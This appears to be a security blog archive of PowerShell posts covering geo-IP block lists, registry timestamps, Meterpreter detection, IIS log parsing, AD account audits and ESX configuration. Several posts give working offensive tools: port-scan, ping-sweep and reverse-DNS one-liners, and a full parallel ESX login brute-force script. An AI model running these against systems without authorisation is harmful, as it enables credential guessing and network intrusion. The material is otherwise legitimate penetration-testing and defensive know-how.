Blog | Security Whole

Blocking Traffic from Foreign Countries - Creating a block list of Supernets using PowerShell

Tim Medin — Tue, 30 Mar 2010 02:32:00 GMT

The following PowerShell script will create a list of supernets that are outside of the United States. The networks created by this script are intended to be used to restrict network traffic from foreign countries. The results of this script aren't perfect and aren't intended to be perfect. There is trade off between the size of the list and accuracy, and I chose to err on the side of a shorter list of networks so it would not add and extra burden to the firewall.

Here is the script:

$debug = 0

# Filter for records that aren't in the US or run by ARIN
$records = ([xml]((New-Object System.Net.WebClient).DownloadString("http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml"))).registry.record | ? {
$_.designation -notlike "*ARIN*" -and
$_.status -ne "LEGACY"
}

# Create array for holding supernets
$supernets = @()

# Add a property for the Binary representation of the first octet
# Add a property for holding the masked bits, used for finding the supernets
$records | % { $_ |
Add-Member NoteProperty -Name "Bits" -Value ([Convert]::ToString($_.prefix.Split("/")[0],2)).PadLeft(8,"0") -PassThru |
Add-Member NoteProperty -Name "MaskedBits" -Value ""
}

# $i is the current number of mask bits used for finding a supernet
for ($i=1; $i -le 8; $i++) {

# apply the mask, set the masked bits property
# this get the left most $i of bits
$records | % {
$_.MaskedBits = $_.Bits.SubString(0,$i)
}

if ($debug) { $numrecords = $records.count }

# how many /$i networks does it take to fill the current supernet, /1 is 128, /2 is 64 ...
$supernetsize = [Math]::pow(2,8-$i)

if ($debug) { "Supernet Size: $supernetsize" }

# if a full supernet is found, then ...
# a "full" supernet contains all of the /8 networks to fill the supernet
$records | group MaskedBits | ? { $_.Count -eq $supernetsize} | % {
$group = $_

    # create the supernet object and set the properties
    $supernet = "" | Select Prefix,Bits,MaskBits,CIDR
    $supernet.Bits = $group.Name.PadRight(8, "0")
    $supernet.Prefix = [Convert]::ToByte($supernet.Bits, 2)
    $supernet.MaskBits = $i
    $supernet.CIDR = "$($supernet.Prefix).0.0.0/$($supernet.MaskBits)"

# add the supernet to the collection of supernets
$supernets += $supernet

# remove the networks from the full network collection if they were just added as a supernet
$records = $records | ? { $_.Bits.SubString(0,$i) -ne $group.Name }
}

if ($debug) {
    "Matching Supernets Found: $(($numrecords - $records.count)/$supernetsize)"
    $supernets | ? { $_.MaskBits -eq $i }
    "---------------------------------------------------------------------------"
}
}

#output the results
$supernets | Sort Bits | Select Prefix,Bits,MaskBits,CIDR

Now for a bit of explanation...

As you may already know, most IPv4 addresses are controlled by ARIN (North America), APNIC (Asia Pacific), LACNIC (Latin America and Caribbean), and other similar regional internet registries (RIR). Each one controls the ip addresses for a specific portion of the world. We want to create a list of all networks that are not in the United States, and the closest approximation is the ARIN RIR. The problem is, prior to the establishment of the RIRs, some blocks of IP addresses were handed out directly to organizations (and their status is "legacy"). Most of the companies that have the legacy address spaces are US based and we will assume they are allowed.

First, we get the list of networks from IANA (Internet Assigned Numbers Authority). Our black list will contain all of the networks NOT in the US, so we filter out all of the ARIN controlled IP addresses and the addresses with a "legacy" status. The list is imported in XML format. The nice feature of the xml format is that imports the xml entities as objects, and PowerShell works best with objects. The properties of the objects are prefix, designation, date, status and xref, but we only use the status and the prefix. With these properties defined we can easily use the Where-Object cmdlet (alias ?) to filter out the "safe" address. If you wanted to block a different set of RIRs this is where you could make one simple change to better suit you.

$records = ([xml]((New-Object System.Net.WebClient).DownloadString("http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml"))).registry.record | ? {
$_.designation -notlike "*ARIN*" -and
$_.status -ne "LEGACY"
}

After the import and the filter, the $records variable contains all of the addresses blocks we want to blacklist. We could just quit now, but it would be nice to shorten the list. We can combine the address blocks into supernets. We start by creating a variable to hold the array of supernets.

# Create array for holding supernets
$supernets = @()

To make things easier, we can extend the object given to us from xml. Two properties are added, one to hold the bit representation of the first octet, and the second will be used for storing a masked version of those bits.

The $records variable (as previously stated, contains all the networks to be blocked) is piped into the ForEach-Object cmdlet (alias %). Inside the loop we create the properties and set the Bits property. The initial value for the Masked Bits is blank since we will set that later.

Now that the object is created the way we want it, we start a For loop. The loop will go from 1 to 8, representing each bit in the octet, and it will be used for masking.

# $i is the current number of mask bits used for finding a supernet
for ($i=1; $i -le 8; $i++) {

Now to use our newly created property and set the Mask Bits on each object.

# apply the mask, set the masked bits property
# this get the left most $i of bits
$records | % {
$_.MaskedBits = $_.Bits.SubString(0,$i)
}

The $records variable is piped into a ForEach-Object loop. Inside the loop we apply the mask. The mask takes the left most bits. When $i is one, we only look at the leftmost bit. When $i is 2, we take the two leftmost bits, and so on.

Now we need to calculate how many networks it takes to "fill" a supernet with our mask. A mask of 1 will require 128 networks to be full, a mask of 2 will require 64 networks, 3 requires 32, and so on.

# how many /$i networks does it take to fill the current supernet, /1 is 128, /2 is 64 ...
$supernetsize = [Math]::pow(2,8-$i)

Now we have the supernet size, so let's see if we have any full supernets.

# if a full supernet is found, then ...
# a "full" supernet contains all of the /8 networks to fill the supernet
$records | group MaskedBits | ? { $_.Count -eq $supernetsize} | % {

We pipe the $records variable into Group-Object, where the grouping is done in the Masked Bits. All of the networks with matching Mask Bits will be put in a group. We then filter all groups that are full by using the Where-Object cmdlet to filter groups that have the required number of elements. If any make it through the filter they are piped into the ForEach-Object cmdlet, where we create the supernet.

$group = $_

# add the supernet to the collection of supernets
$supernets += $supernet

# remove the networks from the full network collection if they were just added as a supernet
$records = $records | ? { $_.Bits.SubString(0,$i) -ne $group.Name }
}
}

First we set a the $group variable equal to the current group, $_ represents the group passed into the ForEach-Object cmdlet. Next, we create a variable to hold the supernet and set the properties of the supernet. The Bits property is the masked bits, the Prefix is the decimal equivalent of the masked bits, the Mask Bits is the number of bits used in the mask, and CIDR is just a pretty version of the Prefix and the Mask Bits. For example, the fourth pass through the For loop uses four bits for the mask. It finds a full supernet matching the four leftmost bits 0101. The supernet Bits are 01010000, Prefix is 80, Masked Bits is 4, and the CIDR is 80.0.0.0/4.

The supernet is added to the collection of supernets. We then need to remove the networks in the supernet from the $records variable so we don't use them again. This is done by filtering the $records variable for all networks that match our masked bits. In the case above, we would remove all networks that start with 0101xxxx.

The loop then starts over with a slightly bigger mask which looks from smaller supernets.

All we have left to do is output the results.

#output the results
$supernets | Sort Bits | Select Prefix,Bits,MaskBits,CIDR

Results:
Prefix Bits     MaskBits CIDR
------ ----     -------- ----
     0 00000000        7 0.0.0.0/7
     2 00000010        8 2.0.0.0/8
     5 00000101        8 5.0.0.0/8
    10 00001010        8 10.0.0.0/8
    14 00001110        8 14.0.0.0/8
    23 00010111        8 23.0.0.0/8
    27 00011011        8 27.0.0.0/8
    31 00011111        8 31.0.0.0/8
    36 00100100        7 36.0.0.0/7
    39 00100111        8 39.0.0.0/8
    41 00101001        8 41.0.0.0/8
    42 00101010        8 42.0.0.0/8
    46 00101110        8 46.0.0.0/8
    49 00110001        8 49.0.0.0/8
    58 00111010        7 58.0.0.0/7
    60 00111100        7 60.0.0.0/7
    62 00111110        8 62.0.0.0/8
    77 01001101        8 77.0.0.0/8
    78 01001110        7 78.0.0.0/7
    80 01010000        4 80.0.0.0/4
   100 01100100        6 100.0.0.0/6
   104 01101000        7 104.0.0.0/7
   106 01101010        8 106.0.0.0/8
   109 01101101        8 109.0.0.0/8
   110 01101110        7 110.0.0.0/7
   112 01110000        4 112.0.0.0/4
   175 10101111        8 175.0.0.0/8
   176 10110000        5 176.0.0.0/5
   185 10111001        8 185.0.0.0/8
   186 10111010        7 186.0.0.0/7
   189 10111101        8 189.0.0.0/8
   190 10111110        8 190.0.0.0/8
   193 11000001        8 193.0.0.0/8
   194 11000010        7 194.0.0.0/7
   197 11000101        8 197.0.0.0/8
   200 11001000        6 200.0.0.0/6
   210 11010010        7 210.0.0.0/7
   212 11010100        7 212.0.0.0/7
   217 11011001        8 217.0.0.0/8
   218 11011010        7 218.0.0.0/7
   220 11011100        6 220.0.0.0/6
   224 11100000        3 224.0.0.0/3

I hope that helps.

Getting registry last write time with PowerShell

Tim Medin — Tue, 02 Feb 2010 23:14:00 GMT

All registry keys have a value associated with called the Last Write Time. This is analogous to the last modification time for a file. When ever the registry key or one if its values has been created, modified, or deleted the value is updated to the current local system time. Unfortunately, there is no Last Write Time associated with a registry value, but it can be infered from the Last Write Time of the key.

Here is a PowerShell script to read the Last Write Time for a registry key.

Usage:

Get-RegKeyLastWriteTime.ps1 <Key> <SubKey>

Example:

Get-RegKeyLastWriteTime.ps1 HKLM SOFTWARE\Microsoft\Windows\CurrentVersion

Output:

Key                         LastWriteTime
---                         -------------
AdminDebug                  10/28/2009 7:50:51 PM
App Management              7/14/2009 4:41:12 AM
App Paths                   1/22/2010 2:07:18 PM
Applets                     7/14/2009 4:41:12 AM
Audio                       7/14/2009 4:41:12 AM
Authentication              7/14/2009 4:41:12 AM
BitLocker                   7/14/2009 4:41:12 AM
...

Get-RegKeyLastWriteTime.ps1 Script:

param (	[string] $Key, [string] $SubKey )

switch ($Key) {
    "HKCR" { $searchKey = 0x80000000} #HK Classes Root
    "HKCU" { $searchKey = 0x80000001} #HK Current User
    "HKLM" { $searchKey = 0x80000002} #HK Local Machine
    "HKU"  { $searchKey = 0x80000003} #HK Users
    "HKCC" { $searchKey = 0x80000005} #HK Current Config
    default { 
        #throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
    }
}


$KEYQUERYVALUE = 0x1
$KEYREAD = 0x19
$KEYALLACCESS = 0x3F

$sig1 = @'
[DllImport("advapi32.dll", CharSet = CharSet.Auto)]
  public static extern int RegOpenKeyEx(
    int hKey,
    string subKey,
    int ulOptions,
    int samDesired,
    out int hkResult);
'@
$type1 = Add-Type -MemberDefinition $sig1 -Name Win32Utils `
    -Namespace RegOpenKeyEx -Using System.Text -PassThru

$sig2 = @'
[DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
extern public static int RegEnumKeyEx(
    int hkey,
    int index,
    StringBuilder lpName,
    ref int lpcbName,
    int reserved,
    int lpClass,
    int lpcbClass,
    out long lpftLastWriteTime);
'@
$type2 = Add-Type -MemberDefinition $sig2 -Name Win32Utils `
    -Namespace RegEnumKeyEx -Using System.Text -PassThru

$sig3 = @'
[DllImport("advapi32.dll", SetLastError=true)]
public static extern int RegCloseKey(
    int hKey);
'@
$type3 = Add-Type -MemberDefinition $sig3 -Name Win32Utils `
    -Namespace RegCloseKey -Using System.Text -PassThru


$hKey = new-object int
$result = $type1::RegOpenKeyEx($searchKey, $SubKey, 0, $KEYREAD, [ref] $hKey)

#initialize variables
$builder = New-Object System.Text.StringBuilder 1024
$index = 0
$length = [int] 1024
$time = New-Object Long

#234 means more info, 0 means success. Either way, keep reading
while ( 0,234 -contains $type2::RegEnumKeyEx($hKey, $index++, `
    $builder, [ref] $length, $null, $null, $null, [ref] $time) )
{
    #create output object
    $o = "" | Select Key, LastWriteTime
    $o.Key = $builder.ToString()
    $o.LastWriteTime = (Get-Date $time).AddYears(1600)
    $o

    #reinitialize for next time through the loop  
    $length = [int] 1024
    $builder = New-Object System.Text.StringBuilder 1024
}

$result = $type3::RegCloseKey($hKey);

Finding Meterpreter

Tim Medin — Mon, 01 Feb 2010 00:52:00 GMT

In our recent post on the Command Line Kung Fu blog, Advanced Process Whack-a-Mole, we tried to find meterpreter using these two commands:

Windows command line:

C:\> tasklist /FI "modules eq metsrv.dll"

PowerShell

PS C:\> Get-Process | ? { $_.Modules -like "*(metsrv.dll)*" }

In version MetaSploit 3.3, and presumably future versions, the metsrv.dll is not visible due to Reflective DLL injection. It does work on v2 and v3.0-3.2. However, there are still footprints of meterpreter in v3.3. Two other dll's are loaded with meterpreter that many processes don't load.

C:\WINDOWS\system32\rsaenh.dll
C:\WINDOWS\system32\IPHLPAPI.DLL

We can look for processes that have these two dll's loaded using either of these two commands.

Windows command line:

C:\> tasklist /fi "MODULES eq rsaenh.dll" /fi "MODULES eq iphlpapi.dll"

PowerShell

PS C:\> Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" 
  -and $_.Modules -like "*(iphlpapi.dll)*"}

The problem is, some processes load these dll's so it isn't a 100% sign of pwnage. The processes include:

explorer.exe
iexplore.exe
lsass.exe
svchost.exe
winlogon.exe

If IE were compromised it wouldn't be obvious, but it is obvious if Icecast was.

PS C:\> Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" 
  -and $_.Modules -like "*(iphlpapi.dll)*"} | select ProcessName

ProcessName
-----------
explorer
Icecast2
IEXPLORE
lsass
svchost
svchost
svchost
winlogon

It is also apparent if meterpreter has been migrated to a process that doesn't normally load the dll's. In my testing I migrated to calc. Here are the results now.

PS C:\> Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" 
  -and $_.Modules -like "*(iphlpapi.dll)*"} | select ProcessName

ProcessName
-----------
calc
explorer
Icecast2
IEXPLORE
lsass
svchost
svchost
svchost
winlogon

If we had a baseline of processes that load these dll's then we can use PowerShell to filter out processes that don't normally load the dll's.

PS C:\> Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" 
  -and $_.Modules -like "*(iphlpapi.dll)*" -and 
  "explorer","iexplore","lsass","svchost","winlogon" -notcontains  $_.ProcessName }

ProcessName
-----------
calc
Icecast2

In this example Icecast2 was the initial point of compromise and meterpreter has migrated to calc.

While this isn't a perfect way to find meterpreter it is better than nothing.

UPDATE:
According to Stephen Fewer, one of the MetaSploit developers:
iphlpapi.dll is imported by the meterpreters stdapi extension for the route and ipconfig commands.

rsaenh.dll (The Microsoft Enhanced Cryptographic Provider DLL) is being loaded via advapi32.dll after a call from the openssl subsystem within meterpreter calling advapi32!CryptAcquireContext[1]

PowerShell IIS Log Objectifier

Tim Medin — Mon, 18 Jan 2010 21:07:00 GMT

This script will read the W3C Extended Log File Format with the default logging options. If you add or remove columns from your log then you will have to modify this script.

################################################################
# Description: IIS Log Importer
# Version: 1.0
# Author: Tim Medin
# Email: TimMedin A@T securitywhole D.O.T com
# Note: This script will read the W3C Extended Log File Format
# with the default logging options. If you add or remove columns
# from your log then you will have to modify this script.
################################################################

param (
[string] $Path
)

[regex]$regex = '\s*(?<date>\S+)\s+(?<time>\S+)\s+(?<sitename>\S+)\s+(?<computername>\S+)\s+(?<ip>\S+)\s+(?<method>\S+)\s+(?<uristem>\S+)\s+(?<uriquery>\S+)\s+(?<port>\S+)\s+(?<username>\S+)\s+(?<sourceip>\S+)\s+(?<UserAgent>\S+)\s+(?<status>\S+)\s+(?<substatus>\S+)\s+(?<win32status>\S*)'

Get-Content $Path | Select-String -Pattern "^[^#]" | % {
if ($_ -match $regex) {
    $log = "" | Select TimeStamp, SiteName, ComputerName, IP, Method, UriStem, UriQuery, Port, Username, SourceIp, UserAgent, Status, SubStatus, Win32Status
    $log.TimeStamp = Get-Date "$($matches.Date) $($matches.Time)"
    $log.Sitename = $matches.Sitename
    $log.Computername = $matches.Computername
    $log.Ip = $matches.Ip
    $log.Method = $matches.Method
    $log.UriStem = $matches.UriStem
    $log.UriQuery = $matches.UriQuery
    $log.Port = $matches.Port
    $log.Username = $matches.Username
    $log.SourceIp = $matches.SourceIp
    $log.UserAgent = $matches.UserAgent
    $log.Status = $matches.Status
    $log.SubStatus = $matches.SubStatus
    $log.Win32Status = $matches.Win32Status
    $log
}
}

Powershell Port Scan

Tim Medin — Thu, 24 Sep 2009 02:11:00 GMT

Ed Skoudis used the for loop to create an ftp script for the ftp command in order to do a port scan. I did an modification to it so that it didn't require the script file and no files were written to the file system. You can find that posting here:
http://blog.securitywhole.com/2009/02/28/ftp-port-scanning.aspx

In my quest to port the Kung Fu of Mr. Skoudis in to powershell I came up with this command:

1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10.10",$_)) "$_ is open" } 2>out-null

If you have been following the previous entries there isn't anything fancy here, except one handy little trick that has to do with the output from the echo command. If you look closely you see that the command attempts to write the output of the connection as well as the string at the end. If the first portion throws an error, then the second part isn't output. Here is a simple example with the output.

PS C:\> echo (1+1) (2+2)
2
4

If we replace the (1+1) with (1/0) then nothing is displayed (other than the error). . If we discard the error with 2>Out-Null then there is no output.

PS C:\> echo (1/0) (2+2) 2>Out-Null
(No Output)

We can use this to our advantage. If our connection fails, an error is raised and we don't output the "$_ is open" portion. If the connection works then the "$_ is open" is displayed.

Unfortunately, there is no easy way to change the connection timeout so this process is slow. We can do it with asynchronous calls, but that is a lot of work and is no longer a one liner. I'll put that in a future version.

Powershell NSLookup Brute Force

Tim Medin — Thu, 24 Sep 2009 00:36:00 GMT

Stealing two other commands from Mr. Skoudis we can do an nslookup of each host in a range.

for /L %i in (1,1,255) do @echo 10.10.10.%i: & @nslookup 10.10.10.%i 2>nul | find "Name"
10.10.10.1
10.10.10.2
10.10.10.3
Name: server.blah.com
10.10.10.4

for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
Name: server.blah.com
10.10.10.3

The first command shows each IP as it is looked up. The second only shows those that successfully resolve.

Here is the powershell version and it's output:

1..255 | % { [System.Net.Dns]::GetHostByAddress("10.10.10.$_") } 2> Out-Null | Format-List
HostName : server.blah.com
Aliases : {loadbalancer.blah.com, service.blah.com, service2.blah.com, service3.blah.com}
AddressList : {10.10.10.3}

You'll notice a big difference from the first output. The standard nslookup just returns one result, while the powershell version gets all the aliases. We may not have ever known about those other DNS entries otherwise.

Using the [System.Net.Dns]::GetHostByAddress() method gives us more power, plus we can send the objects we want down the pipeline for further actions. We use the 2> Out-Null so that the error messages for the unresolvable IP addresses aren't shown.

Powershell Ping Sweep

Tim Medin — Thu, 24 Sep 2009 00:14:00 GMT

Ed Skoudis came up with some fantastic Command Line Kung Fu for Windows to do some basic scanning. Powershell is becoming more and more common so I decided to port these commands to powershell. I think Ed would agree that the standard windows commands can be rather painful and aren't easily extensible (blasted windows) and I hoped to make it slightly less agonizing. In order to make it easier to understand, I won't use the shortcuts in my examples for the foreach-object cmdlet (%) or where-object cmdlet (?).

The first CLKF I thought I would tackle was the ping sweep. You can check out the great write-up over at the Command Line Kung Fu Blog.
http://blog.commandlinekungfu.com/2009/03/episode-6-command-line-ping-sweeper.html

Taken from the blog, here is the Windows command to do ping sweep at the command line and its associated output:

C:\>for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

Reply from 192.168.1.1: bytes=32 time=4ms TTL=64
Reply from 192.168.1.3: bytes=32 time=5ms TTL=64
Reply from 192.168.1.37: bytes=32 time=4ms TTL=64

The above command uses a FOR loop to ping each device and looks for "Reply" in the output. If there is a "Reply" then the host is up (duh).

Here is the powershell version and its output:

PS C:\>1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("10.10.10.$_") } | where-object {$_.Status -eq "success"} | select Address

Address
-------
10.10.10.1
10.10.10.3
10.10.10.37

At first glance the results are very similar and you would think, "Why all the extra typing? The second command is 2.5 times longer!" The big difference between the standard windows command line and powershell is that the latter uses objects, which gives a lot of power...in our shell. Not let's see how it works...

In the above command the range operator (..) generates a list of the numbers 1 through 255. The cool thing is you don't have to use just a single range, you can string them together like this (1..5),7,(9..10) which would give you the numbers 1-10 skipping 6 and 8.

foreach-object { (new-object System.Net.Networkinformation.Ping).Send("10.10.10.$_") }

The foreach-object takes the numbers fed into the pipeline and operates on them one at a time. First, it creates a new ping object and then calls the send method. The parameter given to the send method is a string concatenation of 10.10.10. and the number from $_, which is the "current pipeline object." The $_ variable in our example will contain the numbers 1-255.

where-object {$_.Status -eq "success"}

The output of the send method is the PingReply object which contains a status. We can filter the results only successful pings reply objects will be sent further down the pipeline.

Select Address

Finally, all we care about is the address so that is the only piece we have displayed.

Now that we know how it works, let's pimp out our powershell version.

First, we don't have to just use a contiguous set of numbers. If we wanted to scan all ip address before 10.10.10.100, after 10.10.10.200 and 10.10.10.155 we could use this:

(1..99),(200..255),155 | foreach-object ....

We can use the results to feed into other commands. You can ping sweep an entire subnet and have it automatically do an nslookup, attempt to list the contents of the c$ share, and tell you that you are doing a good job (a little positive reinforcement never hurts).

PS C:\>1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("10.10.10.$_") } | where-object {$_.Status -eq "success"} | foreach-object { nslookup $_; gci "\\$($_.Address)\c$"; echo "Good Job" }

The ping sweep can be sped up by setting a timeout value (in milliseconds). In the example below we set the timeout value to 100ms.

... (new-object System.Net.Networkinformation.Ping).Send("10.10.10.$_", 100) ...

Next time we'll look into using the powershell version of nslookup and the brute force reverse dns lookup.

VMware Login via AD

Tim Medin — Mon, 21 Sep 2009 03:18:00 GMT

I put this together in order to integrate the login from VMWare into AD.

NTP
To setup the ESX server for AD authentication the following steps need to be taken. NTP needs to be done first so the server has a time close to that of the domain controller. The ntp ports need to be opened via the gui and the deamon needs to be started as well.

Allow the ntp client access through the firewall
In the GUI under the Configuration tab click on Security Profile then click on Properties… on the top right. A Firewall Options window will open. Click the checkbox next to NTP Client.

Edit the ntp configuration file located at /etc/ntp.conf

Under servers add the same servers the domain uses for ntp (i.e. tock.usno.navy.mil and tick.usno.navy.mil)
Add:
restrict default kod nomodify notrap
delete:
fudge line
server 127.127.1.0 #local clock
e.g.:
restrict default kod nomodify notrap
server tock.usno.navy.mil
server tick.usno.navy.mil

Edit the steptickers file located at /etc/ntp/step-tickers
add the same servers the domain uses for ntp on separate lines
tock.usno.navy.mil
tick.usno.navy.mil

restart the ntp service:
service ntpd restart

check to make sure the time update worked (from command line)
ntpdate -q tock.usno.navy.mil
ntpdate -q tick.usno.navy.mil

Active Directory Authentication
Paste these lines into the CLI. The first two lines can be added via the GUI. VIC -> Configuration -> Security Profile -> Properties -> Add activeDirectorKerberos [sic] (NOT Kerberos).
esxcfg-firewall --openPort 88,tcp,out,KerberosClient
esxcfg-firewall --openPort 464,tcp,out,KerberosPasswordChange
esxcfg-auth --enablead --addomain agstar.local --addc mydc.mycdomain.blah
esxcfg-auth --enablekrb5 --krb5realm=agstar.local --krb5kdc=mydc.mycdomain.blah-–krb5adminserver=mydc.mycdomain.blah

Edit the VMWare Authentication deamon config located at /etc/pam.d/vmware-authd and add this line to the top:
auth sufficient /lib/security/pam_unix_auth.so shadow nullok

Prevent users’ password from expiring since that is taken care of in AD.
esxcfg-auth --passmaxdays=-1

Add users using the username found in AD
adduser jdoe
adduser ymomma
adduser bdover

Done

Now don't forgot to add the users to the wheel groups so they can ssh to the box. Also, add them to the sudoers file so they don't have to use su.

Brute Force ESX Username/Password

Tim Medin — Tue, 01 Sep 2009 13:16:00 GMT

This script will brute force the connection to ESX. You can either give it a single username or a username file. Similarly, you can either give it a single password or a password file. You also have the ability to define how many jobs will run in parallel.

#--------------------------------------------------------------
#Description: Powershell Simple VMware ESX Login Brute Force Script
#Version: 1.0
#Author: Tim Medin
#Email: TimMedin A@T securitywhole D.O.T com
#--------------------------------------------------------------
#Parameter Declaration
param (
[Parameter(Position=0)]
[string] $Server = $(Read-Host -prompt "Server"),
[Parameter(Mandatory=$false)]
[string] $User,
[Parameter(Mandatory=$false)]
[string] $Password,
[Parameter(Mandatory=$false)]
[string] $UsersFile,
[Parameter(Mandatory=$false)]
[string] $PasswordsFile,
[Parameter(Mandatory=$false)]
[int] $MaxJobs = 10
)

# Function to handle the jobs once they complete
# As the jobs finish (Completed, or Failed) they are handled by this routine
# Each Job has a child job that actually does the work, if that job
# does not have an error then we have found a successful user/pass combo
Function Handle-Jobs {
    Get-Job | Where-Object {$_.State -ne "Running"} | ForEach-Object {
        $job = $_
        if (!$job.ChildJobs[0].Error) {
            # Found one!
            Receive-Job $job -Keep | Out-Null
            # Echo the user/pass combo stored the job name
            echo "Found $($job.Name)"
            #Clean up all the running jobs
            Get-Job | Stop-Job
            Get-Job | Remove-Job
            #quit
            exit
        }
        Remove-Job $job
    }
}

# Make sure we have enough info passed in from the parameters
if (!$User -and !$UsersFile) {
    throw "User or UserFile required."
}
if (!$Password -and !$PasswordsFile) {
    throw "Password or PasswordFile required."
}

# If the UsersFile and a Username are provided then use the UsersFile
# Convert UsersFile or single User into an array so we can use a loop
if ($UsersFile)
{
    $Users = Get-Content $UsersFile
}
else
{
    $Users = @($User)
}

# If the PasswordsFile and aPassword is provided then use the PasswordsFile
# Convert PasswordsFile or single Password into an array so we can use a loop
if ($PasswordsFile)
{
    $Passwords = Get-Content $PasswordsFile
}
else
{
    $Passwords = @($Password)
}

$Passwords | ForEach-Object {
    $pass = $_
    $Users | ForEach-Object {
        $usr = $_

        # If too many jobs running then wait for some to complete
        while ((Get-Job).Count -ge $MaxJobs) {
            Handle-Jobs
            Start-Sleep -Seconds 5
        }

        # Start the job to attempt the connection
        Start-Job -InitializationScript {Add-PSSnapin VMware.VimAutomation.Core} -ScriptBlock { param($Server, $usr, $pass) Connect-VIServer -Server $Server -Protocol https -User $usr -Password $pass } -Name "User:$usr Pass:$pass" -ArgumentList $Server,$usr,$pass
    }
}

"Everything has been queued, waiting for jobs to complete"

# Wait for the jobs to complete
Do {
    Handle-Jobs
    Start-Sleep -Seconds 5
} while (Get-Job)

Finding Old or Unused Accounts with Powershell v2

Tim Medin — Wed, 12 Aug 2009 13:49:00 GMT

Here is a version that was 200 times faster in my environment. Depending on the number of domain controllers it could be even faster for you. It does one big query for each domain controller and then compiles the results. The original script took 45 minutes, this version took 13 seconds.

This script returns a list with all users and their last logon date/time. You can then filter by logon's older than a certain date/time, sort, or export it.

$dcs = [System.DirectoryServices.ActiveDirectory.Domain]::getcurrentdomain().DomainControllers | select name

$startdate = get-date('1/1/1601')

$lst = new-Object System.Collections.ArrayList
foreach ($dc in $dcs) {
$root = [ADSI] "LDAP://$($dc.Name):389"
$searcher = New-Object System.DirectoryServices.DirectorySearcher $root
$searcher.filter = "(&(objectCategory=person)(objectClass=user))"
$searcher.PropertiesToLoad.Add("name") | out-null
$searcher.PropertiesToLoad.Add("LastLogon") | out-null
$searcher.PropertiesToLoad.Add("displayName") | out-null
$searcher.PropertiesToLoad.Add("userAccountControl") | out-null
$searcher.PropertiesToLoad.Add("canonicalName") | out-null
$searcher.PropertiesToLoad.Add("title") | out-null
$searcher.PropertiesToLoad.Add("sAMAccountName") | out-null
$searcher.PropertiesToLoad.Add("sn") | out-null
$searcher.PropertiesToLoad.Add("givenName") | out-null
$results = $searcher.FindAll()

foreach ($result in $results)
{

  $user = $result.Properties;
  $usr = $user | select -property @{name="Name"; expression={$_.name}},
          @{name="LastLogon"; expression={$_.lastlogon}},
          @{name="DisplayName"; expression={$_.displayname}},
          @{name="Disabled"; expression={(($_.useraccountcontrol[0]) -band 2) -eq 2}},
          @{name="CanonicalName"; expression={$_.canonicalname}},
          @{name="Title"; expression={$_.title}},
          @{name="sAMAccountName"; expression={$_.samaccountname}},
          @{name="LastName"; expression={$_.sn}},
          @{name="FirstName"; expression={$_.givenname}}

$lst.Add($usr) | out-null
}
}

$lst | group name | select-object Name,
         @{Expression={ ($_.Group | Measure-Object -property LastLogon -max).Maximum }; Name="LastLogon" },
         @{Expression={ ($_.Group | select-object -first 1).DisplayName}; Name="DisplayName" },
         @{Expression={ ($_.Group | select-object -first 1).CanonicalName}; Name="CanonicalName" },
         @{Expression={ ($_.Group | select-object -first 1).Title}; Name="Title" },
         @{Expression={ ($_.Group | select-object -first 1).sAMAccountName}; Name="sAMAccountName" },
         @{Expression={ ($_.Group | select-object -first 1).LastName}; Name="LastName" },
         @{Expression={ ($_.Group | select-object -first 1).FirstName}; Name="FirstName" },
         @{Expression={ ($_.Group | select-object -first 1).Disabled}; Name="Disabled" } |
     select-object Name, DisplayName, CanonicalName, Title, sAMAccountName, LastName, FirstName, Disabled,
         @{Expression={ $startdate.adddays(($_.LastLogon / (60 * 10000000)) / 1440) }; Name="LastLogon" }

Finding Old or Unused Accounts with Powershell

Tim Medin — Mon, 29 Jun 2009 16:35:00 GMT

Recently I tried to find accounts that haven't been used in a long time. In order to do this I wrote a powershell script to get the last logon time for all accounts in the domain. The problem is, each domain controller contains a different time for the Last Logon depending on which was used as the logon server. In order to get an accurate time we need to get the last logon from each domain controller for each user. This is NOT a fast process. If there are 500 users and 4 domain controllers that is 2000 requests. On top of that some of the domain controllers might be a different location with a slower WAN link which will make it go even slower.

Note: This script requires Quest Software's Active Directory cmdlets. You can download it from here: http://www.quest.com/powershell/activeroles-server.aspx

Add-PSSnapIn Quest.ActiveRoles.ADManagement -ErrorAction SilentlyContinue

$dcs = Get-QADComputer -ComputerRole DomainController

$users = Get-QADUser -SizeLimit 0

#$ErrorActionPreference = "Continue"

foreach ($user in $users) {

#"Searching $($user.Name)"

$lastlogon = $null

foreach ($dc in $dcs) {

$dclogon = (Get-QADUser -Service $dc.Name -SamAccountName $user.Name).LastLogon

#"$($user.Name) $($dc.Name) $dclogon"

if ($dclogon -ne $Null) {

if ($lastlogon -lt $dclogon) {

#write-host "replacing"

$lastlogon = $dclogon

}

if ($lastlogon -eq $Null) { $lastlogon = [dbnull]::value }

#"$($user.Name) $lastlogon"

$o = New-Object PSObject

$o | Add-Member NoteProperty "User" $user.Name

$o | Add-Member NoteProperty "LastLogin" $lastlogon

$o | Add-Member NoteProperty "DisplayName" $user.DisplayName

$o | Add-Member NoteProperty "Disabled" ([ADSI]("LDAP://$($user.DN.ToString())")).PsBase.InvokeGet("AccountDisabled")

$o | Add-Member NoteProperty "DistinguishedName" $user.DN

$o | Add-Member NoteProperty "Title" $user.title

$o | Add-Member NoteProperty "SamAccountName" $user.SamAccountName

$o | Add-Member NoteProperty "LastName" $user.LastName

$o | Add-Member NoteProperty "FirstName" $user.FirstName

Write-Output $o

}

Assuming you put this script in the file Get-LastLogin.ps1 you can find all accounts that haven't logged in during the past 90 days.

.\Get-LastLogin.ps1 | where {$_.LastLogin -lt (Get-Date).AddDays(-90)}

If you want to sort the results and save it as a csv you can do this:

